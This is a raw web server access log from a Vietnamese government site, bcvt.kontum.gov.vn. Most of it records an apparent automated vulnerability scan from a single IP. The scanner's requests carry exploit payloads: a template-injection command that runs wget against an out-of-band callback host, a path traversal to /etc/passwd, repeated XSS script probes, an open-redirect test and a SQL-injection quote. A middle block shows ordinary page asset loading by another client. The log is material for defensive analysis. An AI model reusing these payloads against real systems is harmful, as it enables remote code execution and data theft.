2023-10-13 23:24:24 103.153.214.94 GET /category_view.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 213
2023-10-13 23:24:26 103.153.214.94 GET /folder_view.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 207
2023-10-13 23:27:22 103.153.214.94 POST /admin/index.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 405 0 1 210
2023-10-13 23:27:24 103.153.214.94 GET /admin/dashboard.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 301 0 0 206
2023-10-13 23:27:52 103.153.214.94 POST /dfsms/index.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 405 0 1 207
2023-10-13 23:27:55 103.153.214.94 GET /dfsms/add-category.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 206
2023-10-13 23:28:14 103.153.214.94 POST /ccms/index.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 206
2023-10-13 23:28:17 103.153.214.94 GET /ccms/dashboard.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 204
2023-10-13 23:28:26 103.153.214.94 POST /ubus/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 405 0 1 210
2023-10-13 23:30:14 103.153.214.94 GET /page id=2WfF0qWGPx7X6wNjs0Peduopn1W&settings[view%20options][outputFunctionName]=x;process.mainModule.require(%27child_process%27).execSync(%27wget+http://ckjv7uic8b6p3donsoogsj7maba5r7rau.oast.online%27);s 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 207
2023-10-13 23:32:19 103.153.214.94 PUT /v1/agent/check/register - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 405 0 1 207
2023-10-13 23:32:21 103.153.214.94 PUT /v1/agent/check/deregister/2WfF0gCfMnxzbvgYtuLmUtWITt0 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 205
2023-10-13 23:32:34 103.153.214.94 GET /downloader.php file=../../../../../../../../../../../../../etc/passwd%00.jpg 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 205
2023-10-13 23:32:53 103.153.214.94 GET /nagiosxi/login.php redirect=/www.interact.sh 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 205
2023-10-13 23:33:43 103.153.214.94 GET /Solar_History.php time_begin=xx%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&time_end&event_level=0&event_pcs=1&search_on=on&search_off=on&word=hj%27&sort_type=0&record=10&command=%95%5C%8E%A6 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 209
2023-10-13 23:34:01 103.153.214.94 GET /Solar_SlideSub.php id=4&play=1&pow=sds%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&bgcolor=green 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 208
2023-10-13 23:35:27 103.153.214.94 GET /onlinePreview url=aHR0cDovL3d3dy54eHguY29tL3h4eC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPjEyMw%3D%3D 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 213
2023-10-13 23:35:50 103.153.214.94 POST /conf_mail.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 405 0 1 872
2023-10-13 23:38:23 103.153.214.94 GET /wp-content/plugins/elementor/readme.txt - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 208
2023-10-13 23:38:42 103.153.214.94 POST /scgi-bin/platform.cgi - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 405 0 1 937
2023-10-13 23:38:44 103.153.214.94 POST /scgi-bin/platform.cgi - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 405 0 1 203
2023-10-13 23:40:59 103.153.214.94 GET /carbon/admin/login.jsp loginStatus=false&errorCode=%27);alert(document.domain)// 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 212
2023-10-13 23:41:42 103.153.214.94 POST /fileupload/toolsAny - 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 405 0 1 207
2023-10-13 23:41:43 103.153.214.94 GET /authenticationendpoint/2wff0lra5bkoxctrsfiidzrs8qh.jsp - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 209
2023-10-13 23:42:52 103.153.214.94 GET /logfile d=crossdomain.xml 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 206
2023-10-13 23:44:15 103.153.214.94 POST /cgi-bin/login.cgi - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 405 0 1 210
2023-10-13 23:49:19 103.153.214.94 GET /dms/admin/accounts/payment_history.php account_id=2%27 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 215
2023-10-13 23:50:19 103.153.214.94 GET / - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 - 200 0 0 263
2023-10-13 23:50:19 103.153.214.94 GET /runtime-es5.js - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 220
2023-10-13 23:50:23 103.153.214.94 GET /polyfills-es5.js - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 3847
2023-10-13 23:50:29 103.153.214.94 GET /styles-es5.js - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 5754
2023-10-13 23:50:57 103.153.214.94 GET /vendor-es5.js - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 27431
2023-10-13 23:50:59 103.153.214.94 GET /main-es5.js - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1347
2023-10-13 23:51:07 103.153.214.94 GET /data-table.eot - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 214
2023-10-13 23:51:07 103.153.214.94 GET /data-table.eot - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 901
2023-10-13 23:51:08 103.153.214.94 GET /data-table.woff - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 214
2023-10-13 23:51:08 103.153.214.94 GET /data-table.ttf - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 213
2023-10-13 23:51:08 103.153.214.94 GET /data-table.svg - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 213
2023-10-13 23:51:08 103.153.214.94 GET /~@swimlane/ngx-datatable/index.css - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 237
2023-10-13 23:51:08 103.153.214.94 GET /~@swimlane/ngx-datatable/themes/material.scss - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 234
2023-10-13 23:51:09 103.153.214.94 GET /~@swimlane/ngx-datatable/assets/icons.css - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 249
2023-10-13 23:51:10 103.153.214.94 GET /ui-icons_222222_256x240.png - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1039
2023-10-13 23:51:13 103.153.214.94 GET /Avenir_Next_W00_400.eot - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 3063
2023-10-13 23:51:14 103.153.214.94 GET /Avenir_Next_W00_400.woff2 - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1276
2023-10-13 23:51:15 103.153.214.94 GET /Avenir_Next_W00_400.woff - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1117
2023-10-13 23:51:17 103.153.214.94 GET /Avenir_Next_W00_400.ttf - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1702
2023-10-13 23:51:21 103.153.214.94 GET /Avenir_Next_W00_400.svg - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 3887
2023-10-13 23:51:21 103.153.214.94 GET /Avenir_Next_W00_Italic_400.eot - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 640
2023-10-13 23:51:23 103.153.214.94 GET /Avenir_Next_W00_Italic_400.woff2 - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1061
2023-10-13 23:51:25 103.153.214.94 GET /Avenir_Next_W00_Italic_400.woff - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1786
2023-10-13 23:51:28 103.153.214.94 GET /Avenir_Next_W00_Italic_400.ttf - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 3028
2023-10-13 23:51:32 103.153.214.94 GET /Avenir_Next_W00_Italic_400.svg - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 3821
2023-10-13 23:51:32 103.153.214.94 GET /Avenir_Next_W00_600.eot - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 693
2023-10-13 23:51:33 103.153.214.94 GET /Avenir_Next_W00_600.woff2 - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 641
2023-10-13 23:51:34 103.153.214.94 GET /Avenir_Next_W00_600.woff - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1119
2023-10-13 23:51:37 103.153.214.94 GET /Avenir_Next_W00_600.ttf - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 2759
2023-10-13 23:51:41 103.153.214.94 GET /Avenir_Next_W00_600.svg - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 3876
2023-10-13 23:51:41 103.153.214.94 GET /Avenir_Next_W00_Italic_600.eot - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 639
2023-10-13 23:51:44 103.153.214.94 GET /Avenir_Next_W00_Italic_600.woff2 - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1839
2023-10-13 23:51:45 103.153.214.94 GET /Avenir_Next_W00_Italic_600.woff - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1489
2023-10-13 23:51:48 103.153.214.94 GET /Avenir_Next_W00_Italic_600.ttf - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 2758
2023-10-13 23:51:51 103.153.214.94 GET /manager-manager-module-ngfactory-es5.js - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 52127
2023-10-13 23:51:53 103.153.214.94 GET /Avenir_Next_W00_Italic_600.svg - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 4550
2023-10-13 23:51:53 103.153.214.94 GET /CalciteWebCoreIcons.ttf iz9r4h 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 640
2023-10-13 23:51:55 103.153.214.94 GET /CalciteWebCoreIcons.woff iz9r4h 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1362
2023-10-13 23:51:57 103.153.214.94 GET /CalciteWebCoreIcons.svg iz9r4h 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1912
2023-10-13 23:51:57 103.153.214.94 GET /basemap-toggle-64.svg - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 213
2023-10-13 23:51:57 103.153.214.94 GET /loading-throb.gif - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 215
2023-10-13 23:51:57 103.153.214.94 GET /search.svg - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 232
2023-10-13 23:51:57 103.153.214.94 GET /helpIcon.png - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 214
2023-10-13 23:51:58 103.153.214.94 GET /search32.png - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 531
2023-10-13 23:51:58 103.153.214.94 GET /transparent-bg.png - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 235
2023-10-13 23:51:58 103.153.214.94 GET /slider-handle.png - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 213
2023-10-13 23:51:58 103.153.214.94 GET /raster-symbology-editor-stretch-type-min-max.png - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 213
2023-10-13 23:51:58 103.153.214.94 GET /raster-symbology-editor-stretch-type-none.png - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 214
2023-10-13 23:51:59 103.153.214.94 GET /raster-symbology-editor-stretch-type-standard-deviation.png - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 214
2023-10-13 23:51:59 103.153.214.94 GET /raster-symbology-editor-stretch-type-percent-clip.png - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 213
2023-10-13 23:51:59 103.153.214.94 GET /raster-symbology-editor-band-combination-natural-color.png - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 213
2023-10-13 23:52:00 103.153.214.94 GET /raster-symbology-editor-band-combination-land-water.png - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 213
2023-10-13 23:52:00 103.153.214.94 GET /raster-symbology-editor-band-combination-landuse.png - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 214
2023-10-13 23:52:01 103.153.214.94 GET /raster-symbology-editor-band-combination-bathymetric.png - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 764
2023-10-13 23:52:01 103.153.214.94 GET /raster-symbology-editor-band-combination-vegetation.png - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 214
2023-10-13 23:52:01 103.153.214.94 GET /raster-symbology-editor-band-combination-color-infrared.png - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 213
2023-10-13 23:52:01 103.153.214.94 GET /raster-symbology-editor-symbology-type-rgb.png - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 213
2023-10-13 23:52:01 103.153.214.94 GET /raster-symbology-editor-symbology-type-stretch.png - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 214
2023-10-13 23:52:03 103.153.214.94 GET /raster-symbology-editor-symbology-type-unique-value.png - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 214
2023-10-13 23:52:03 103.153.214.94 GET /raster-symbology-editor-symbology-type-discrete.png - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 214
2023-10-13 23:52:03 103.153.214.94 GET /handles.png - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 232
2023-10-13 23:52:03 103.153.214.94 GET /Loading_Indicator_double_32.svg - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 214
2023-10-13 23:52:15 103.153.214.94 GET /favicon.ico - 443 - 158.51.124.184 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 995 11778
2023-10-13 23:53:26 103.153.214.94 POST /ztp/cgi-bin/handler - 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 405 0 1 213
2023-10-13 23:54:12 103.153.214.94 GET /atmail/index.php/admin/index/ error=1%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 210
2023-10-13 23:56:33 103.153.214.94 GET /index_en.php from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 213
2023-10-13 23:56:35 103.153.214.94 GET /index.php from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 204
